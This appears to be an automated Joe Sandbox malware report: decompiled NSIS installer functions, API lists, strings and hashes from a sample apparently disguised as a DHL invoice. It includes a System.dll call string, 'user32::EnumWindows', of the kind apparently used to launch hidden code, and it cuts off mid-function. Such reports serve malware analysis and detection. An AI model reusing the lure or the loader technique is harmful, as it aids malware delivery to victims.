Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: 8uA$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_#U53d1#U7968.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-14889028
Opcode ID: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
Instruction ID: 38a706e546d8de2da2def33f7086105d1948706aa1bd56b4a23ee49e5693a868
Opcode Fuzzy Hash: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
Instruction Fuzzy Hash: 0A51B171504310BFD720AF21DD81B1B7BA8AB4471AF10093FFA55B72E1C7789A848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405EBA Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00405EBA() {
				signed int _t33;
				WCHAR* _t35;
				void* _t39;
				void* _t40;
				short _t41;
				signed int _t46;
				void* _t48;
				int _t49;
				void* _t58;
				signed int _t59;
				signed int _t60;
				signed int _t65;
				WCHAR* _t78;
				signed char* _t80;
				signed int _t84;
				signed int _t85;
				WCHAR* _t90;
				short _t91;
				WCHAR* _t93;
				void* _t96;
				signed int _t101;
				signed int _t103;
				signed char* _t107;
				signed int _t110;
				void* _t111;

				_t33 =  *(_t111 + 8);
				if(_t33 < 0) {
					_t33 =  *( *0x4349e0 - 4 + _t33 * 4);
				}
				_t90 = 0x4339a0;
				_t78 =  *(_t111 + 0x1c);
				_t107 =  *0x435a38 + _t33 * 2;
				_t93 = 0x4339a0;
				if(_t78 >= 0x4339a0 && _t78 - 0x4339a0 >> 1 < 0x800) {
					_t93 = _t78;
					_t78 = 0;
					 *((intOrPtr*)(_t111 + 0x24)) = 0;
				}
				_t84 =  *_t107 & 0x0000ffff;
				if(_t84 == 0) {
					L41:
					 *_t93 = 0;
					if(_t78 == 0) {
						_t35 = _t90;
					} else {
						_t35 = E00406B1A(_t78, _t90);
					}
					return _t35;
				} else {
					_t96 = 2;
					while(1) {
						_t80 = _t107;
						if((_t93 - _t90 & 0xfffffffe) >= 0x800) {
							break;
						}
						_t91 = _t84 & 0x0000ffff;
						_t107 =  &(_t107[_t96]);
						_t39 = 4;
						if(_t91 >= _t39) {
							if(__eflags != 0) {
								 *_t93 = _t91;
							} else {
								_t41 =  *_t107;
								_t107 =  &(_t80[4]);
								 *_t93 = _t41;
							}
							_t40 = _t96;
							L39:
							_t84 =  *_t107 & 0x0000ffff;
							_t93 = _t93 + _t40;
							_t90 = 0x4339a0;
							if(_t84 != 0) {
								continue;
							}
							break;
						}
						_t85 =  *_t107 & 0x000000ff;
						_t101 = (_t80[3] & 0x0000007f) << 0x00000007 |  *_t107 & 0x0000007f;
						 *(_t111 + 0x18) = _t85;
						 *(_t111 + 0x14) = _t85 | 0x00008000;
						_t46 = _t107[1] & 0x000000ff;
						_t107 =  &(_t80[4]);
						 *(_t111 + 0x20) = _t46;
						 *(_t111 + 0x20) = _t46 | 0x00008000;
						_t48 = 2;
						 *(_t111 + 0x10) = _t107;
						if(_t91 != _t48) {
							__eflags = _t91 - 3;
							if(_t91 != 3) {
								__eflags = _t91 - 1;
								if(__eflags == 0) {
									_push( !_t101);
									_push(_t93);
									E00405EBA();
								}
							} else {
								__eflags = _t101 - 0x1d;
								if(__eflags != 0) {
									E00406B1A(_t93, L"user32::EnumWindows(i r1 ,i 0)" + (_t101 << 0xb));
									__eflags = _t101 - 0x15 - 7;
									if(__eflags < 0) {
										E00406D3D(_t93);
									}
								} else {
									E0040661F(_t93,  *0x4349f8);
								}
							}
							L34:
							_t49 = lstrlenW(_t93);
							_t40 = _t49 + _t49;
							_t96 = 2;
							goto L39;
						}
						_t58 = 4;
						_t110 =  !=  ? _t58 : _t48;
						_t121 = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 != 0x24) {
									do {
										_t59 =  *0x4349f0;
										_t110 = _t110 - 1;
										__eflags = _t59;
										if(_t59 == 0) {
											L19:
											_t60 = _t111 + 0x2c;
											_push(_t60);
											_push( *((intOrPtr*)(_t111 + 0x18 + _t110 * 4)));
											_push( *0x4349f8);
											L0040802C();
											__eflags = _t60;
											if(_t60 != 0) {
												goto L21;
											}
											__imp__SHGetPathFromIDListW( *((intOrPtr*)(_t111 + 0x30)), _t93);
											__imp__CoTaskMemFree( *(_t111 + 0x2c));
											__eflags = _t60;
											if(_t60 != 0) {
												break;
											}
											goto L21;
										}
										_t65 =  *_t59( *0x4349f8,  *((intOrPtr*)(_t111 + 0x20 + _t110 * 4)), 0, 0, _t93); // executed
										__eflags = _t65;
										if(_t65 == 0) {
											break;
										}
										goto L19;
										L21:
										 *_t93 = 0;
										__eflags = _t110;
									} while (_t110 != 0);
									L22:
									_t103 =  *(_t111 + 0x20);
									goto L23;
								}
								GetWindowsDirectoryW(_t93, 0x400);
								goto L22;
							}
							GetSystemDirectoryW(_t93, 0x400);
							goto L22;
						} else {
							E00406977(_t85 & 0x0000003f, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x435a38 + (_t85 & 0x0000003f) * 2, _t93, _t85 & 0x00000040);
							_t103 =  *(_t111 + 0x20);
							if( *_t93 == 0) {
								_push(_t103);
								_push(_t93);
								E00405EBA();
							}
							L23:
							if( *_t93 != 0 && _t103 == 0x1a) {
								lstrcatW(_t93, L"\\Microsoft\\Internet Explorer\\Quick Launch");
							}
							E00406D3D(_t93);
							_t107 =  *(_t111 + 0x10);
							goto L34;
						}
					}
					_t78 =  *(_t111 + 0x28);
					goto L41;
				}
			}

0x00405eba
0x00405ec3
0x00405ed4
0x00405ed4
0x00405edc
0x00405ee2
0x00405ee7
0x00405eed
0x00405ef1
0x00405f00
0x00405f02
0x00405f04
0x00405f04
0x00405f08
0x00405f0f
0x00406103
0x00406105
0x0040610a
0x00406115
0x0040610c
0x0040610e
0x0040610e
0x0040611d
0x00405f15
0x00405f18
0x00405f19
0x00405f1b
0x00405f27
0x00000000
0x00000000
0x00405f2f
0x00405f32
0x00405f34
0x00405f38
0x004060d7
0x004060e5
0x004060d9
0x004060d9
0x004060dd
0x004060e0
0x004060e0
0x004060e8
0x004060ea
0x004060ea
0x004060ee
0x004060f0
0x004060f8
0x00000000
0x00000000
0x00000000
0x004060f8
0x00405f49
0x00405f53
0x00405f55
0x00405f60
0x00405f64
0x00405f68
0x00405f6b
0x00405f76
0x00405f7a
0x00405f7b
0x00405f82
0x00406082
0x00406085
0x004060bb
0x004060be
0x004060c2
0x004060c3
0x004060c4
0x004060c4
0x00406087
0x00406087
0x0040608a
0x004060a6
0x004060ae
0x004060b1
0x004060b4
0x004060b4
0x0040608c
0x00406093
0x00406093
0x0040608a
0x004060c9
0x004060ca
0x004060d2
0x004060d4
0x00000000
0x004060d4
0x00405f93
0x00405f94
0x00405f97
0x00405f99
0x00405fd9
0x00405fdc
0x00405fec
0x00405fef
0x00405fff
0x00405fff
0x00406004
0x00406005
0x00406007
0x0040601e
0x0040601e
0x00406022
0x00406023
0x00406027
0x0040602d
0x00406032
0x00406034
0x00000000
0x00000000
0x0040603b
0x00406047
0x0040604d
0x0040604f
0x00000000
0x00000000
0x00000000
0x0040604f
0x00406018
0x0040601a
0x0040601c
0x00000000
0x00000000
0x00000000
0x00406051
0x00406053
0x00406056
0x00406056
0x0040605a
0x0040605a
0x00000000
0x0040605a
0x00405ff7
0x00000000
0x00405ff7
0x00405fe4
0x00000000
0x00405f9b
0x00405fb9
0x00405fc3
0x00405fc7
0x00405fcd
0x00405fce
0x00405fcf
0x00405fcf
0x0040605e
0x00406063
0x00406070
0x00406070
0x00406077
0x0040607c
0x00000000
0x0040607c
0x00405f99
0x004060fe
0x00000000
0x00406102

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FE4

Part of subcall function 00406B1A: lstrcpynW.KERNEL32(?,?,00000400,00403871,00434A00,NSIS Error), ref: 00406B27

Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DB2
Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DC6
Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76383420,004039C2), ref: 00406DDE

GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,?,?,?,?,00000000,?,?), ref: 00405FF7
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,?,?,?,?,00000000,?,?), ref: 004060CA

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 0040609F
Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 00405F15
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405FAF
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040606A
Call, xrefs: 00405EDC, 00405FAA, 00405FCE, 00405FE3, 00405FF6, 00406009, 00406036, 0040606F, 00406076, 00406092, 004060A5, 004060B3, 004060C3, 004060C9, 004060F0, 0040610C

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
API String ID: 4187626192-1259842955
Opcode ID: 311af7c87eb71035c8d5b2a7baacc15b69a4590f910f25a3f4acb13c9fbad21a
Instruction ID: 8c51b57b95ad5d2f56c6428f73255cfba4eda90222275d8884e674a65d57f274
Opcode Fuzzy Hash: 311af7c87eb71035c8d5b2a7baacc15b69a4590f910f25a3f4acb13c9fbad21a
Instruction Fuzzy Hash: 05611471240216ABDB20AF248C40A7B76A5EF99314F12453FF942FB2D1D77CD9218B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D3A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00405D3A(signed int _a4, WCHAR* _a8) {
				WCHAR* _v40;
				long _v52;
				int _v56;
				void* _v60;
				void* _t18;
				signed int _t19;
				long _t20;
				signed char _t29;
				signed int _t35;
				WCHAR* _t39;
				WCHAR* _t40;
				struct HWND__* _t43;

				_t43 =  *0x4349e8;
				if(_t43 == 0) {
					return _t18;
				}
				_t29 =  *0x435af4;
				_t35 = _t29 & 0x00000001;
				if(_t35 == 0) {
					_push(_a4);
					_push(0x42ed78);
					E00405EBA();
				}
				_t19 = lstrlenW(0x42ed78);
				_t39 = _a8;
				_a4 = _t19;
				if(_t39 == 0) {
					_t40 = 0x42ed78;
					goto L7;
				} else {
					_t19 = lstrlenW(_t39) + _a4;
					if(_t19 >= 0x1000) {
						L13:
						return _t19;
					}
					_t40 = 0x42ed78;
					_t19 = lstrcatW(0x42ed78, _t39);
					L7:
					if((_t29 & 0x00000004) == 0) {
						_t19 = SetWindowTextW( *0x4349c8, _t40); // executed
					}
					if((_t29 & 0x00000002) == 0) {
						_v40 = _t40;
						_v60 = 1;
						_t20 = SendMessageW(_t43, 0x1004, 0, 0); // executed
						_v52 = 0;
						_v56 = _t20 - _t35;
						SendMessageW(_t43, 0x104d - _t35, 0,  &_v60); // executed
						_t19 = SendMessageW(_t43, 0x1013, _v56, 0); // executed
					}
					if(_t35 != 0) {
						_t19 = _a4;
						0x42ed78[_t19] = 0;
					}
					goto L13;
				}
			}

0x00405d3e
0x00405d46
0x00405e1b
0x00405e1b
0x00405d4d
0x00405d5c
0x00405d5f
0x00405d61
0x00405d65
0x00405d66
0x00405d66
0x00405d6c
0x00405d71
0x00405d75
0x00405d7b
0x00405da0
0x00000000
0x00405d7d
0x00405d83
0x00405d8c
0x00405e14
0x00000000
0x00405e16
0x00405d93
0x00405d99
0x00405da5
0x00405da8
0x00405db1
0x00405db1
0x00405dba
0x00405dbe
0x00405dd0
0x00405dd8
0x00405ddc
0x00405de0
0x00405df3
0x00405e00
0x00405e00
0x00405e04
0x00405e06
0x00405e0c
0x00405e0c
0x00000000
0x00405e04

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?), ref: 00405D99
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll), ref: 00405DB1
SendMessageW.USER32(?), ref: 00405DD8
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 00405D57, 00405D65, 00405D6B, 00405D93, 00405D98, 00405DA0, 00405DAA

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll
API String ID: 1759915248-677553244
Opcode ID: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
Instruction ID: 65e3057419f119a88936ccc655a9da3a15af0d16a1f773064a71e2051a7db8da
Opcode Fuzzy Hash: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
Instruction Fuzzy Hash: D121C2B2A056206BD310AB59DC44AABBBDCEF94710F45043FB984A3291C7B89D404AED

Uniqueness

Uniqueness Score: -1.00%

Function 00403148 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403148(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v124;
				short _v132;
				intOrPtr _v136;
				signed int _v140;
				int _v144;
				intOrPtr _v148;
				long _v152;
				signed int _v156;
				signed int _v160;
				void* _t39;
				void* _t40;
				signed int _t41;
				void* _t45;
				long _t47;
				signed int _t50;
				intOrPtr _t52;
				intOrPtr _t53;
				long _t55;
				long _t56;
				void* _t57;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t74;
				void* _t76;
				signed int _t77;
				intOrPtr _t81;
				int _t82;
				signed int* _t83;

				_t83 =  &_v156;
				_t72 = _a4;
				_t74 = _a12;
				_t71 =  !=  ? _a16 : 0x8000;
				_t77 = 0;
				_t37 =  !=  ? _t74 : 0x423538;
				_v144 =  !=  ? _t74 : 0x423538;
				if(_a4 >= 0) {
					E00403131( *0x435a58 + _t72);
				}
				_t39 = E00406948(_t72,  *0x40b010,  &_v156, 4); // executed
				if(_t39 == 0) {
					L31:
					_push(0xfffffffd);
					goto L32;
				} else {
					_t41 = _v156;
					if(_t41 >= 0) {
						if(_t74 != 0) {
							_t77 =  <  ? _t41 : _a16;
							if(E0040311B(_t74, _t77) != 0) {
								L20:
								return _t77;
							}
							goto L31;
						}
						if(_t41 <= 0) {
							goto L20;
						}
						while(1) {
							_t76 =  <  ? _t41 : _t71;
							if(E0040311B(0x41f538, _t76) == 0) {
								goto L31;
							}
							_t45 = E00406A0B(_t72, _a8, 0x41f538, _t76); // executed
							if(_t45 == 0) {
								L29:
								_push(0xfffffffe);
								L32:
								_pop(_t40);
								return _t40;
							}
							_t77 = _t77 + _t76;
							_t41 = _v156 - _t76;
							_v156 = _t41;
							if(_t41 > 0) {
								continue;
							}
							goto L20;
						}
						goto L31;
					}
					_t47 = GetTickCount();
					 *0x40dea4 =  *0x40dea4 & _t77;
					 *0x40dea0 =  *0x40dea0 & _t77;
					_v152 = _t47;
					 *0x417530 = 0x40f528;
					 *0x41752c = 0x40f528;
					_t50 = _v156 & 0x7fffffff;
					 *0x40d988 = 8;
					_t73 = _t50;
					 *0x417528 = 0x417528;
					_v140 = _t50;
					_v156 = _t73;
					if(_t50 <= 0) {
						goto L20;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t81 =  <  ? _t73 : 0x4000;
						if(E0040311B(0x41f538, 0x4000) == 0) {
							goto L31;
						}
						_v156 = _v156 - 0x4000;
						 *0x40d97c = _t81;
						_t82 = _v144;
						 *0x40d978 = 0x41f538;
						while(1) {
							_push(0x40d978);
							 *0x40d980 = _t82;
							 *0x40d984 = _t71;
							_t52 = E0040728E();
							_v136 = _t52;
							if(_t52 < 0) {
								break;
							}
							_t53 =  *0x40d980; // 0x423538
							_v152 = _t53 - _t82;
							_t55 = GetTickCount();
							_t73 = _v160;
							_v140 = _t55;
							if(( *0x435af4 & 0x00000001) != 0 && (_t55 - _v156 > 0xc8 || _t73 == 0)) {
								wsprintfW( &_v132, L"... %d%%", MulDiv(_v144 - _t73, 0x64, _v144));
								_t83 =  &(_t83[3]);
								E00405D3A(0,  &_v124);
								_t73 = _v160;
								_v156 = _v140;
							}
							_t56 = _v152;
							if(_t56 == 0) {
								if(_t73 > 0) {
									goto L5;
								}
								goto L20;
							} else {
								if(_t74 != 0) {
									_t82 =  *0x40d980; // 0x423538
									_t71 = _t71 - _t56;
									_v148 = _t82;
									L17:
									_t77 = _t77 + _t56;
									if(_v136 != 1) {
										continue;
									}
									goto L20;
								}
								_t57 = E00406A0B(_t73, _a4, _t82, _t56); // executed
								if(_t57 == 0) {
									goto L29;
								}
								_t56 = _v152;
								goto L17;
							}
						}
						_push(0xfffffffc);
						goto L32;
					}
					goto L31;
				}
			}

0x00403148
0x0040314e
0x0040315e
0x0040316c
0x00403174
0x00403178
0x0040317b
0x00403181
0x0040318b
0x0040318b
0x0040319d
0x004031a4
0x00403379
0x00403379
0x00000000
0x004031aa
0x004031aa
0x004031b0
0x0040331d
0x0040336b
0x00403377
0x00403313
0x00000000
0x00403313
0x00000000
0x00403377
0x00403321
0x00000000
0x00000000
0x00403328
0x0040332c
0x00403338
0x00000000
0x00000000
0x00403343
0x0040334a
0x0040335e
0x0040335e
0x0040337b
0x0040337b
0x00000000
0x0040337b
0x00403350
0x00403352
0x00403354
0x0040335a
0x00000000
0x00000000
0x00000000
0x0040335c
0x00000000
0x00403328
0x004031b6
0x004031bc
0x004031c2
0x004031c8
0x004031d1
0x004031d6
0x004031df
0x004031e4
0x004031ee
0x004031f0
0x004031fa
0x004031fe
0x00403202
0x00000000
0x00000000
0x00000000
0x00000000
0x00403208
0x00403208
0x0040320f
0x0040321f
0x00000000
0x00000000
0x00403225
0x00403229
0x0040322f
0x00403233
0x0040323d
0x0040323d
0x00403242
0x00403248
0x0040324e
0x00403253
0x00403259
0x00000000
0x00000000
0x0040325f
0x00403266
0x0040326a
0x00403277
0x0040327b
0x0040327f
0x004032ab
0x004032b1
0x004032bb
0x004032c4
0x004032c8
0x004032c8
0x004032cc
0x004032d2
0x0040330d
0x00000000
0x00000000
0x00000000
0x004032d4
0x004032d6
0x004032f0
0x004032f6
0x004032f8
0x004032fc
0x004032fc
0x00403303
0x00000000
0x00000000
0x00000000
0x00403309
0x004032e1
0x004032e8
0x00000000
0x00000000
0x004032ea
0x00000000
0x004032ea
0x004032d2
0x00403317
0x00000000
0x00403317
0x00000000
0x00403208

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 0040326A
MulDiv.KERNEL32(?,00000064,?), ref: 0040329A
wsprintfW.USER32 ref: 004032AB

Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F

Strings

... %d%%, xrefs: 004032A5
85B, xrefs: 00403155
85B, xrefs: 00403242, 0040325F, 004032F0

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$85B$85B
API String ID: 999035486-2772677642
Opcode ID: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
Instruction ID: e2bf7c2ae867e5e0c149cd35682d72f4c4d2633ef795981e2bf4a0daba4be17b
Opcode Fuzzy Hash: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
Instruction Fuzzy Hash: 355180716083019BD710DF69DD84A2BBBE8AB84756F10493FFC54E7291DB38DE088B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040619E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040619E(intOrPtr _a4) {
				short _v576;
				int _t8;
				void* _t9;
				struct HINSTANCE__* _t13;
				void* _t14;
				void* _t19;

				_t8 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t8 > 0x104 || _t8 == 0) {
					_t9 = 0;
					goto L5;
				} else {
					_t9 = _t8 + _t8;
					if( *((short*)(_t19 + _t9 - 0x23e)) == 0x5c) {
						L5:
						_t14 = 0x4092b2;
					} else {
						_t14 = 0x4092b0;
					}
				}
				wsprintfW(_t9 +  &_v576, L"%s%S.dll", _t14, _a4);
				_t13 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t13;
			}

0x004061b5
0x004061be
0x004061d8
0x00000000
0x004061c4
0x004061c4
0x004061cf
0x004061da
0x004061da
0x004061d1
0x004061d1
0x004061d1
0x004061cf
0x004061f1
0x00406205
0x0040620c

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
wsprintfW.USER32 ref: 004061F1
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406205

Strings

\, xrefs: 004061C6
%s%S.dll, xrefs: 004061EB
UXTHEME, xrefs: 004061AD

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
Instruction ID: 46fd840fe6511d7ccc003e1cb9660209246fe71c7ecdf6ea51a48f4d7cc48468
Opcode Fuzzy Hash: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
Instruction Fuzzy Hash: 93F0BB7160022467DB10A764DC0DB9A36ACEB00304F50447AA906F61C2E77CDE54C79C

Uniqueness

Uniqueness Score: -1.00%

Function 00406A56 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406A56(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				signed int _t12;
				WCHAR* _t15;
				signed int _t17;
				void* _t21;
				WCHAR* _t24;

				_t24 = _a4;
				_t21 = 0x64;
				while(1) {
					_t21 = _t21 - 1;
					_v12 = 0x73006e;
					_v8 = 0x61;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_v8 = _v8 + _t12 % _t17;
